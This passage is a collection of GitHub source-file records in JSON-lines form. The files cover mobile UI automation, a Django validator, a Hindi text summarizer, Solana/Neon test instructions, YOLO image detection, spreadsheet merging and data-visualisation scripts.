'坐标格式或数量不对,正确格式如:elment|200,300'\n location = self.locat(elements[0])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if speed:\n self.driver.flick_element(location, end_x, end_y, int(speed))\n\n def flick(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n self.driver.flick(start_x, start_y, end_x, end_y)\n\n def drag_and_drop(self, step):\n elements = step['elements']\n assert isinstance(elements, list) and len(\n elements) == 2, '元素格式或数量不对,正确格式如:origin_el|destination_el'\n origin = self.locat(elements[0])\n destination = self.locat(elements[1]) \n self.driver.drag_and_drop(origin, destination)\n\n def long_press(self, step):\n action = TouchAction(self.driver)\n\n element = step['element']\n duration = step['data'].get('持续时间', 1000)\n if ',' in element or ',' in element:\n position = element.replace(',', ',').split(',')\n x = int(position[0])\n y = int(position[1])\n action.long_press(x=x, y=y, duration=duration).perform()\n else:\n location = self.locat(element)\n action.long_press(location, duration=duration).perform()\n sleep(0.5)\n\n def pinch(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.pinch(location, percent, steps)\n\n def zoom(self, step):\n element = step['element']\n location = self.locat(element)\n percent = step['data'].get('百分比', 200)\n steps = step['data'].get('步长', 50)\n self.driver.zoom(location, percent, steps)\n\n def hide_keyboard(self, step):\n self.driver.hide_keyboard()\n\n def shake(self, step):\n self.driver.shake()\n\n def launch_app(self, step):\n self.driver.launch_app()\n\n def is_locked(self, step):\n status = self.driver.is_locked()\n assert status, \"it's not locked\"\n\n def lock(self, step):\n self.driver.lock()\n\n def unlock(self, step):\n self.driver.unlock()","repo_name":"tonglei100/sweetest","sub_path":"sweet/modules/mobile/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"53"}
+{"seq_id":"27268875644","text":"from rest_framework import serializers\n\nfrom users.models import User\nfrom api_yamdb.settings import RESERVED_NAME\n\n\ndef validate_users(self, data):\n if_username = User.objects.filter(username=data.get('username'))\n if_email = User.objects.filter(email=data.get('email'))\n if User.objects.filter(username=data.get('username'),\n email=data.get('email')).exists():\n return data\n if if_email:\n raise serializers.ValidationError(f'Почта {if_email}'\n f'уже использовалась')\n if if_username:\n raise serializers.ValidationError(f'Имя {if_username}'\n f'уже использовалось')\n if str(data.get('username')).lower() == RESERVED_NAME:\n raise serializers.ValidationError('Нельзя использовать имя me')\n return data\n","repo_name":"MihaRooll/yamdb_final","sub_path":"api_yamdb/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19558735726","text":"from django.shortcuts import render\nimport numpy as np\nimport sys\nimport pandas as pd\nimport nltk\nimport re\nimport codecs\nfrom hindi_summarizer.sent_segment import sent_tokenize\nfrom hindi_summarizer.word_segment import Tokenizer\nfrom bs4 import BeautifulSoup as bs\nimport requests as r\nimport networkx as nx\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport json\n#from hindi_summarizer.w2v import vocab\ndef main(l):\n try:\n if(l[0:12]==\"https://www.\"):\n all_of_it=\"\"\n req=r.get(l)\n con=req.content\n soup=bs(con,'html.parser')\n txt=soup.find_all('p')\n for i in txt:\n all_of_it+=i.text\n else:\n all_of_it=l\n print(all_of_it)\n out=re.split(',|\\.|\\|',all_of_it)\n sentences = sent_tokenize(all_of_it)\n with open('hindi_summarizer\\Aembed_hin.json',encoding='utf8') as f:\n word_embeddings=json.load(f)\n vectors=[]\n l=[]\n [l.append(0) for i in range(100)]\n for i in sentences:\n if len(i) != 0:\n v = sum([np.array(word_embeddings.get(w,l)) for w in i])/(len(i)+0.001)\n else:\n v = np.zeros((100,))\n vectors.append(v)\n print(vectors)\n mat = np.zeros([len(sentences), len(sentences)])\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n mat[i][j] = cosine_similarity(vectors[i].reshape(1,100),vectors[j].reshape(1,100))[0,0]\n nx_graph = nx.from_numpy_array(mat)\n hubs,scores = nx.hits(nx_graph,max_iter=100000000000000000000000000000000000)\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(out)), reverse=True)\n c=0\n s=\"\"\n inl=[]\n k=0.2*len(out)\n for i in ranked_sentences:\n c+=1\n s+=i[1]+'|'\n if(c>k):\n break\n inl.append(s)\n inl.append(all_of_it)\n return inl\n except:\n inl=[]\n inl.append(\"Sorry for the inconvenience our backend does not support articles with bad encoding patterns please try with other websites or try copy pasting text instead of giving the link\")\n inl.append(l)\n return(l)\n","repo_name":"pramod-mamidi/hindi-and-english-text-summarizer","sub_path":"hindi_summarizer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4070657338","text":"NUMBER_OF_SENSORS = 8\nPLOTS_PER_ROw = 3\n\nplots = {\n # default plot parameters\n 'default': {\n 'title': 'Sensor {index}',\n 'color': '6F6',\n 'xrange': [0, 1000],\n 'yrange': [0, 10],\n 'fill': False,\n 'show': True,\n 'link_master': True\n },\n\n # specialized parameters\n 0: {\n 'title': 'Meh',\n 'color': '67C8FF',\n 'yrange': [40, 160],\n 'link_master': False\n },\n 5: {\n 'yrange': [0, 700],\n 'color': 'F66'\n },\n 4: {\n 'fill': '6F63'\n },\n\n #special plots\n 'time': {\n 'show': True,\n 'title': 'Time between updates'\n },\n 'master': {\n 'show': False\n }\n}\n\ntarget_period = 0.01\n\n# defines basic calibration/transformation functions\ntransform = {\n 'default': None,\n # scale [0,1024) => [50,150)\n 0: lambda x: x/1024*100+50,\n # identity\n 3: lambda x: x,\n}\n\n# export to file\nexport = {\n 'raws': {\n 'format': 'text',\n 'stage': 'acquisition',\n 'filename': 'data/raw_data.data'\n },\n 'transformed': {\n 'format': 'text',\n 'stage': 'transform',\n 'filename': 'data/scaled_data.data'\n }\n}","repo_name":"mvonthron/plotsplotsplots","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10376479947","text":"import hashlib\nimport json\nimport math\nimport random\n\nimport base58\nfrom solana.publickey import PublicKey\nfrom solana.system_program import SYS_PROGRAM_ID\nfrom solana.transaction import AccountMeta, TransactionInstruction\nfrom spl.token.constants import ASSOCIATED_TOKEN_PROGRAM_ID, TOKEN_PROGRAM_ID\nfrom spl.token.instructions import get_associated_token_address\n\nCOMPUTE_BUDGET_ID: PublicKey = PublicKey(\n \"ComputeBudget111111111111111111111111111111\")\nDEFAULT_UNITS = 500 * 1000\nDEFAULT_HEAP_FRAME = 256 * 1024\n\n\nclass Instruction:\n @staticmethod\n def account_v3(solana_wallet, neon_wallet_pda,\n neon_wallet, evm_loader_id) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=solana_wallet,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=neon_wallet_pda,\n is_signer=False, is_writable=True),\n ]\n\n data = bytes.fromhex('28') + bytes.fromhex(str(neon_wallet)[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def sync_native(account: PublicKey):\n keys = [AccountMeta(pubkey=account, is_signer=False, is_writable=True)]\n data = bytes.fromhex('11')\n return TransactionInstruction(keys=keys, program_id=TOKEN_PROGRAM_ID, data=data)\n\n\n @staticmethod\n def deposit(solana_pubkey, neon_pubkey, deposit_pubkey,\n neon_wallet_address, neon_mint, evm_loader_id) -> TransactionInstruction:\n associated_token_address = get_associated_token_address(\n solana_pubkey, neon_mint)\n pool_key = get_associated_token_address(deposit_pubkey, neon_mint)\n keys = [\n AccountMeta(pubkey=associated_token_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=pool_key, is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_pubkey, is_signer=False, is_writable=True),\n AccountMeta(pubkey=TOKEN_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=solana_pubkey,\n is_signer=True, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n ]\n\n data = bytes.fromhex('27') + bytes.fromhex(neon_wallet_address[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def compute_budget_utils(operator, units=DEFAULT_UNITS) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"02\") + units.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def request_heap_frame(operator, heap_frame=DEFAULT_HEAP_FRAME) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"01\") + heap_frame.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def associated_token_account(\n payer: PublicKey,\n associated_token: PublicKey,\n owner: PublicKey,\n mint: PublicKey,\n instruction_data: bytes,\n programId=TOKEN_PROGRAM_ID,\n associatedTokenProgramId=ASSOCIATED_TOKEN_PROGRAM_ID) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=payer, is_signer=True, is_writable=True),\n AccountMeta(pubkey=associated_token,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=owner, is_signer=False, is_writable=False),\n AccountMeta(pubkey=mint, is_signer=False, is_writable=False),\n 
AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=programId, is_signer=False, is_writable=False),\n ]\n\n return TransactionInstruction(\n keys=keys,\n program_id=associatedTokenProgramId,\n data=instruction_data\n )\n\n @staticmethod\n def claim(_from, to, amount, web3_client, ata_address,\n emulate_signer, contract, gas_price=None):\n emulated_tx = None\n result = dict()\n\n claim_to = contract.contract.functions.claimTo(\n bytes(ata_address), _from.address, amount)\n data = claim_to.abi\n\n tx = {\n \"from\": _from.address,\n \"to\": to,\n \"nonce\": web3_client.eth.get_transaction_count(emulate_signer.address),\n \"gasPrice\": gas_price if gas_price is not None else web3_client.gas_price(),\n \"chainId\": web3_client._chain_id,\n \"data\": json.dumps(data).encode('utf-8'),\n \"gas\": 100000000\n }\n\n signed_tx = web3_client._web3.eth.account.sign_transaction(\n tx, _from.key)\n\n if signed_tx.rawTransaction is not None:\n emulated_tx = web3_client.get_neon_emulate(\n str(signed_tx.rawTransaction.hex())[2:])\n\n if emulated_tx is not None:\n for account in emulated_tx['result']['accounts']:\n key = account['account']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n if 'contract' in account:\n key = account['contract']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n for account in emulated_tx['result']['solana_accounts']:\n key = account['pubkey']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n return signed_tx, result\n\n @staticmethod\n def buld_tx_instruction(solana_wallet, neon_wallet, neon_raw_transaction,\n neon_keys, evm_loader_id, neon_pool_count):\n program_id = PublicKey(evm_loader_id)\n treasure_pool_index = math.floor(random.randint(\n 0, 1) * int(neon_pool_count)) % int(neon_pool_count)\n treasure_pool_address = get_collateral_pool_address(\n treasure_pool_index, evm_loader_id)\n\n data = bytes.fromhex('1f') + treasure_pool_index.to_bytes(4, 'little') + \\\n bytes.fromhex(str(neon_raw_transaction.hex())[2:])\n keys = [AccountMeta(pubkey=solana_wallet, is_signer=True, is_writable=True),\n AccountMeta(pubkey=treasure_pool_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_wallet,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=program_id, is_signer=False,\n is_writable=False),\n ]\n\n for k in neon_keys:\n keys.append(neon_keys[k])\n\n return TransactionInstruction(\n keys=keys,\n program_id=program_id,\n data=data\n )\n\n\ndef get_collateral_pool_address(index: int, evm_loader_id):\n return PublicKey.find_program_address(\n [bytes('treasury_pool', 'utf8'), index.to_bytes(4, 'little')],\n PublicKey(evm_loader_id)\n )[0]\n\n\ndef get_solana_wallet_signer(solana_account, neon_account, web3_client):\n solana_wallet = base58.b58encode(str(solana_account.public_key))\n neon_wallet = bytes(neon_account.address, 'utf-8')\n new_wallet = hashlib.sha256(solana_wallet + neon_wallet).hexdigest()\n emulate_signer_private_key = f'0x{new_wallet}'\n return web3_client._web3.eth.account.from_key(emulate_signer_private_key)\n","repo_name":"neonevm/neon-tests","sub_path":"utils/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"27085334249","text":"\n\nwhile True:\n n1=input('Digite um numero:')\n operador=input ('Digite um operador[/*+-]:')\n n2=input('Digite um outro numero :')\n\n numeros_validos=None\n n1_float=0\n n2_float=0\n try:\n n1_float=float(n1)\n n2_float=float(n2)\n numeros_validos=True\n\n except Exception as error:\n \n print(error)\n\n\n if numeros_validos is None:\n print('Um ou ambos os numeros digitados são invalidos')\n continue\n operadores_permitidos='/*+-'\n if operador not in operadores_permitidos:\n print('Operador invalido')\n\n if len(operador)>1:\n print('Digite um unico operador')\n continue\n print('Realizando calculo')\n if operador =='+': \n print(n1_float+n2_float)\n elif operador =='-':\n \n print(n1_float-n2_float)\n elif operador =='*':\n \n print(n1_float*n2_float)\n elif operador =='/':\n \n print(n1_float/n2_float)\n\n ######\n sair= input('Sair?[s]').lower().startswith('s')\n \n if sair is True:\n break","repo_name":"Alesfjr/curso_python","sub_path":"calculadora/caculatorWHILE.PY","file_name":"caculatorWHILE.PY","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4685943665","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport claudio_funcoes_usage as cv # function usage geral\nimport pandas as pd\n#from .barras_fx_etaria import barras_fx_etaria, barras_sub_plot_vacina\n#maps\nimport plotly.express as px # plot dynamic\nimport datetime # time\nimport statistics # function statistics\nimport json\nfrom urllib.request import urlopen\nimport pandas as pd\nimport numpy\n\ndef read_data():\n \"\"\"Read data\"\"\"\n #filtered.csv': paciente_datanascimento;paciente_enumsexobiologico;paciente_racacor_codigo;paciente_endereco_uf;vacina_grupoatendimento_codigo;vacina_dataaplicacao;vacina_descricao_dose;vacina_codigo\n dados = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/filtered.csv', ';', 1000) # arquivo com os dados \n grupo_categoria = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo-categoria.csv', ';') # 4 vacina_grupoatendimento_codigo[ vacina_grupoatendimento_codigo;vacina_grupoatendimento_nome;vacina_categoria_nome ]\n #grupo = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo.csv', ';')\n raca = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/raca.csv', ';') # paciente_racacor_codigo, 2\n tipos_vacina = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/vacina.csv', ';') # vacina_codigo 7\n \n vacinas_estado = dict()\n for index in range(1,len(dados)): \n age = int( ( datetime.datetime.today() - datetime.datetime.strptime(dados[index][0], '%Y-%m-%d')).days / 365.25 )\n if vacinas_estado.get( dados[index][3] ) == None: \n vacinas_estado[ dados[index][3] ] = {'qtd' : 0, 'age' : [] }\n vacinas_estado[ dados[index][3] ] ['qtd'] +=1 # estado \n vacinas_estado[ dados[index][3] ] ['age'].append(age) # idade \n \n vacinas_estado = cv.remove_key_dict(vacinas_estado, 'XX'); vacinas_estado = cv.remove_key_dict(vacinas_estado, 'paciente_endereco_uf') \n for k in vacinas_estado: \n vacinas_estado[k]['age_media'] = statistics.mean( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_median'] = statistics.median( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_histogram'] = numpy.histogram(vacinas_estado[k]['age'], bins=10) \n \n dados = {'sigla': list(vacinas_estado.keys()), 'média idade' : [vacinas_estado[k]['age_media'] for k in vacinas_estado],\n 'mediana idade' : [vacinas_estado[k]['age_median'] for k in vacinas_estado],\n 'age_histogram' : [vacinas_estado[k]['age_histogram'] for k in vacinas_estado]}\n dados = pd.DataFrame(dados ) \n brasil = json.load(open( 'dataset/mapa_brasil'))\n \n nomes = []\n sigla_nome = {}\n for feature in brasil['features']: \n feature['id'] = feature['properties']['sigla'] \n #nomes.append( feature['properties']['name'] )\n sigla_nome [ feature['properties']['sigla'] ] = feature['properties']['name'] \n \n nomes_ordem = [] \n for d in dados['sigla']:\n #print(d)\n nomes_ordem.append(sigla_nome[d])\n dados['Nome'] = nomes_ordem\n \n #nomes_estados = ['Acre','Alagoas','Amazonas','Amapá','Bahia','Ceará','Espírito Santo','Goiás','Maranhão','Minas Gerais','Mato Grosso do Sul','Mato Grosso','Pará','Paraíba','Pernambuco','Piauí' ,'Paraná','Rio de Janeiro','Rio Grande do Norte','Rondônia','Roraima','Rio Grande do Sul','Santa Catarina', 'Sergipe', 'São Paulo', 'Tocantins', 'Distrito Federal']\n \n #dados['nomes'] = nomes\n #print(dados)\n \n #print(dados['nomes'])\n #print(dados['sigla'])\n \n fig = px.choropleth(\n dados,\n locations='sigla',\n geojson = brasil,\n 
color='média idade',\n hover_data=['Nome', 'mediana idade'],\n scope='south america'\n ) \n return fig\n #fig.show()\n \n #fig = px.bar(x=list(vacinas_estado.keys()), y=[vacinas_estado[k]['qtd'] for k in vacinas_estado]) \n #fig.update_layout(xaxis_title='Estados', yaxis_title='Quantidade de vacinas')\n #fig.show() \n #fig.write_html(\"html/mapa.html\")\n\n\n\ndef graficos_valiense(app):\n \n return read_data() \n\n components_html = []\n\n #components_html.append(grafico_total_vacinas_idade(app))\n \n #components_html.append(grafico_sub_plot_vacinas_idade(app))\n components_html.append( read_data() )\n\n return components_html","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"valiense/graficos_valiense.py","file_name":"graficos_valiense.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"6409265323","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-15 16:40\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nfrom __future__ import print_function\n\nimport os\nimport cv2\nimport time\nimport pynvml\nimport random\nimport argparse\nimport numpy as np\n\nfrom utils import *\nfrom ctypes import *\nfrom tqdm import tqdm\n\ndef sample(probs):\n s = sum(probs)\n probs = [a/s for a in probs]\n r = random.uniform(0, 1)\n for i in range(len(probs)):\n r = r - probs[i]\n if r <= 0:\n return i\n return len(probs)-1\n\n\ndef c_array(ctype, values):\n arr = (ctype*len(values))()\n arr[:] = values\n return arr\n\n\nclass BOX(Structure):\n _fields_ = [(\"x\", c_float),\n (\"y\", c_float),\n (\"w\", c_float),\n (\"h\", c_float)]\n\n\nclass DETECTION(Structure):\n _fields_ = [(\"bbox\", BOX),\n (\"classes\", c_int),\n (\"prob\", POINTER(c_float)),\n (\"mask\", POINTER(c_float)),\n (\"objectness\", c_float),\n (\"sort_class\", c_int)]\n\n\nclass IMAGE(Structure):\n _fields_ = [(\"w\", c_int),\n (\"h\", c_int),\n (\"c\", c_int),\n (\"data\", POINTER(c_float))]\n\n\nclass METADATA(Structure):\n _fields_ = [(\"classes\", c_int),\n (\"names\", POINTER(c_char_p))]\n\n\nlib = CDLL(\"./darknet/libdarknet.so\", RTLD_GLOBAL)\nlib.network_width.argtypes = [c_void_p]\nlib.network_width.restype = c_int\nlib.network_height.argtypes = [c_void_p]\nlib.network_height.restype = c_int\n\npredict = lib.network_predict\npredict.argtypes = [c_void_p, POINTER(c_float)]\npredict.restype = POINTER(c_float)\n\nset_gpu = lib.cuda_set_device\nset_gpu.argtypes = [c_int]\n\nmake_image = lib.make_image\nmake_image.argtypes = [c_int, c_int, c_int]\nmake_image.restype = IMAGE\n\nget_network_boxes = lib.get_network_boxes\nget_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]\nget_network_boxes.restype = POINTER(DETECTION)\n\nmake_network_boxes = lib.make_network_boxes\nmake_network_boxes.argtypes = [c_void_p]\nmake_network_boxes.restype = POINTER(DETECTION)\n\nfree_detections = lib.free_detections\nfree_detections.argtypes = [POINTER(DETECTION), c_int]\n\nfree_ptrs = lib.free_ptrs\nfree_ptrs.argtypes = [POINTER(c_void_p), c_int]\n\nnetwork_predict = lib.network_predict\nnetwork_predict.argtypes = [c_void_p, POINTER(c_float)]\n\nreset_rnn = lib.reset_rnn\nreset_rnn.argtypes = [c_void_p]\n\nload_net = lib.load_network\nload_net.argtypes = [c_char_p, c_char_p, c_int]\nload_net.restype = c_void_p\n\ndo_nms_obj = lib.do_nms_obj\ndo_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\ndo_nms_sort = lib.do_nms_sort\ndo_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\nfree_image = lib.free_image\nfree_image.argtypes = [IMAGE]\n\nletterbox_image = lib.letterbox_image\nletterbox_image.argtypes = [IMAGE, c_int, c_int]\nletterbox_image.restype = IMAGE\n\nload_meta = lib.get_metadata\nlib.get_metadata.argtypes = [c_char_p]\nlib.get_metadata.restype = METADATA\n\nload_image = lib.load_image_color\nload_image.argtypes = [c_char_p, c_int, c_int]\nload_image.restype = IMAGE\n\nrgbgr_image = lib.rgbgr_image\nrgbgr_image.argtypes = [IMAGE]\n\npredict_image = lib.network_predict_image\npredict_image.argtypes = [c_void_p, IMAGE]\npredict_image.restype = POINTER(c_float)\n\nndarray_image = lib.ndarray_to_image\nndarray_image.argtypes = [POINTER(c_ubyte), POINTER(c_long), POINTER(c_long)]\nndarray_image.restype = IMAGE\n\n\ndef nparray_to_image(img):\n data = img.ctypes.data_as(POINTER(c_ubyte))\n image = ndarray_image(data, 
img.ctypes.shape, img.ctypes.strides)\n return image\n\n\ndef yolo_detect(net, meta, image, thresh=.5, hier_thresh=.1, nms=.45):\n im = nparray_to_image(image)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n res = sorted(res, key=lambda x: -x[1])\n\n free_image(im)\n free_detections(dets, num)\n return res\n\ndef main(args):\n gpu_id = c_int(args.gpu_id)\n set_gpu(gpu_id)\n\n info = load_dict()\n\n input_size = info['input_size']\n yolo_net = load_net(('./darknet/cfg/yolov3-' + str(input_size) + '_test.cfg').encode(),\n ('./darknet/backup/yolov3-' + str(input_size) + '.backup').encode(), 0)\n meta = load_meta(b'./darknet/cfg/voc.data')\n print('Finished loading model!')\n\n labels = [x for x in info['classes'].keys()]\n\n f = open('./darknet/dataset/valid.txt')\n test_picures_path = f.readlines()\n\n resumes = []\n for picture in tqdm(test_picures_path):\n picture = picture.replace('\\n', '')\n\n txt_name = picture.split('/')[-1].replace('jpg','txt')\n f2 = open('results_txt/' + txt_name, 'w', encoding = 'utf-8')\n image = cv2.imread(picture)\n begin = time.time()\n yolo_dets = yolo_detect(yolo_net, meta, image)\n resume = time.time() - begin\n resumes.append(resume)\n FPS = 1/(sum(resumes)/len(resumes))\n print('FPS: ',FPS)\n\n # visulization\n person_boxes = []\n\n for i, det in enumerate(yolo_dets):\n flag = True\n box = det[2]\n cx, cy, w, h = np.array(box)\n x1 = cx - w / 2\n y1 = cy - h / 2\n x2 = cx + w / 2\n y2 = cy + h / 2\n label = det[0].decode()\n index = labels.index(label)\n f2.write(str(index) + ' ' + str(int(x1 + 0.5)) + ' ' + str(int(y1 + 0.5)) + ' ' + str(int(x2 + 0.5)) + ' ' + str(int(y2 + 0.5)) + '\\n')\n if args.save_pic:\n cv2.rectangle(image,(int(x1),int(y1)),(int(x2),int(y2)),(0,255,0),2)\n cv2.putText(image,label,(int(x1), int(y1) - 10),cv2.FONT_HERSHEY_SIMPLEX,2,(0, 0, 255), 2)\n if args.save_pic:\n cv2.imwrite('results/'+picture.split('/')[-1],image)\n f.close()\n write_dict('FPS', int(FPS))\n\n GPU_type, GPU_used = get_gpu_info(args.gpu_id)\n write_dict('GPU_type: ',GPU_type)\n write_dict('GPU_used: ',str(int(GPU_used)) + 'M')\n \n\nif __name__ == '__main__':\n print('detecting...')\n parser = argparse.ArgumentParser('detect images')\n parser.add_argument(\"--gpu_id\", type=int, default=0, help=\"which gpu to use\")\n parser.add_argument(\"--save_pic\", type=bool, default=False, help=\"whether pic to save\")\n arguments = parser.parse_args()\n main(args=arguments)\n\n\n\n\n","repo_name":"isyanan1024/YOLOV3","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"22207102638","text":"import pandas as pd\nimport streamlit as st\n\ndata_df = pd.DataFrame(\n {\n \"widgets\": [\"st.selectbox\", \"st.number_input\", \"st.text_area\", \"st.button\"],\n }\n)\n\nst.dataframe(\n data_df,\n column_config={\n \"widgets\": st.column_config.Column(\n width=\"medium\"\n )\n }\n)\n","repo_name":"streamlit/st-issues","sub_path":"issues/gh-6879/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"23356407829","text":"import os\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n\ntweets = load_workbook(\"/Users/USER/FILE/EXCEL_FILE.xlsx\",data_only=True)\ntweetsWS = tweets[\"Sheet1\"]\n\ncheckingSamples = load_workbook(\"/Users/USER/FILE/EXCEL_FILE#2w.xlsx\",data_only=True)\ncheckingSamplesWS = checkingSamples[\"BR\"]\n\nWB = Workbook()\nWS = WB.active\n\n# create 2D lists to hold cell data\nrowtweets = []\nrowSamples = []\n\n# append cell data to lists\nfor row in range(1,58649):\n columnData = []\n for col in range(1,8):\n char = get_column_letter(col)\n columnData.append(tweetsWS[char+str(row)].value)\n rowtweets.append(columnData)\n\nfor row in range(1,148):\n CheckingData = []\n for col in range(1,4):\n char = get_column_letter(col)\n CheckingData.append(checkingSamplesWS[char+str(row)].value)\n rowSamples.append(CheckingData)\n\n# merge data between two files\nfor i in rowtweets:\n for k in rowSamples:\n if str(i[0]) == str(k[2]):\n i[5] = k[0]\n\n\n# print the new cell data into excel file\nfor b in range(0,len(rowtweets),1):\n WS.append(rowtweets[b])\nWB.save(\"Vinies Tweets.xlsx\")\n","repo_name":"xanderrp2/RandomPractice","sub_path":"Lab_merger_crude.py","file_name":"Lab_merger_crude.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73830166247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Modelo para o Sensor CEI\n# \n# Este dataset **\"DataCEI.csv\"** possui informações dispostas em colunas sobre as características dos objetos que passam pelo sensor:\n# \n# * **Tamanho**: Segue a classificação do CEI2020 (Tamanho='0' - Grande 100%).\n# * **Referencia**: Referência dinâmica do *Threshold.\n# * **NumAmostra**: Número de amostras adquiridas.\n# * **Area**: Somatório das Amplitudes das amostras.\n# * **Delta**: Máxima Amplitude da amostra.\n# * **Output1**: Peça tipo 1.\n# * **Output2**: Peça tipo 2.\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n#Função do cáculo da sigmóide\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\n\n# Carregando os dados\n# Vamos começar lendo o arquivo DataCEI.csv em um dataframe do pandas.\nDataSet=pd.read_csv('arruela_.csv')\nDataSet.head()\nDataSet.drop(['Hora','Tamanho','Referencia'],axis=1,inplace=True)\nDataSet.head()\nDataSet.describe()\n\n# ### Váriaveis do *Dataset*\n\nDataSet.columns\n# ### Número de Peças\n# \n# #### Vamos classificar os grupos pelo número de peças: \n# 1. Grupo com uma peça\n# 2. Grupo com duas peças\nsns.set_style('whitegrid')\nsns.countplot(x='Output2',data=DataSet,palette='RdBu_r')\nplt.show()\n\n# #### Gráfico da distribuição das áreas das 